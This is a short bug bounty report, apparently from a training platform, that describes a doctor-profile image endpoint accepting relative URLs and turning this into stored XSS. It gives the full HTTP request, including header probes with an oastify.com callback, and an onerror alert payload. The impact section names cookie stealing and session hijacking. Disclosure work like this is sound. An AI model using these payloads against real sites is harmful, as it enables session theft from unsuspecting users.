BugBountyHunter

Hello Team,

Summary:

We can upload the image from /drpanel/drapi/edit-dr.php endpoint and it will accept relative URLs to change the image.

Steps To Reproduce:

1. Send this request:

POST /drpanel/drapi/edit-dr.php HTTP/1.1
Host: 84ceebdff6c3-ayush1098.a.firstbloodhackers.com
Cookie: drps=e7ba713ce83c4caf4b907254d
Sec-Ch-Ua: "Not?A_Brand";v="8", "Chromium";v="108", "Google Chrome";v="108"
Sec-Ch-Ua-Platform: "Windows"
Sec-Ch-Ua-Mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36 [email protected] os6cfn5
Accept: */*, text/os6cfn5
Origin: https://os6cfn5.com
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://waahcfda8s29igyjhf28xzg4ovuyszgo.oastify.com/ref
Accept-Encoding: gzip, deflate, os6cfn5
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,hi;q=0.7
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 95

drid=1&name=Jon&bio=sxs&bookable=0&photoUrl=/doctor_1.png

Exploiting this to stored XSS:

We can exploit this to XSS from the file name. This XSS only works for drId=1 and executes on meet_drs.php

The payload is /'"+onerror="alert(document.domain)

The magicbox will pop up on /meet_drs.php endpoint.

Impact:

We can change the image even though there are restrictions in UI and with the XSS, we can do Cookie Stealing, Session Hijacking etc..

Thanks & Regards

Ayush Singh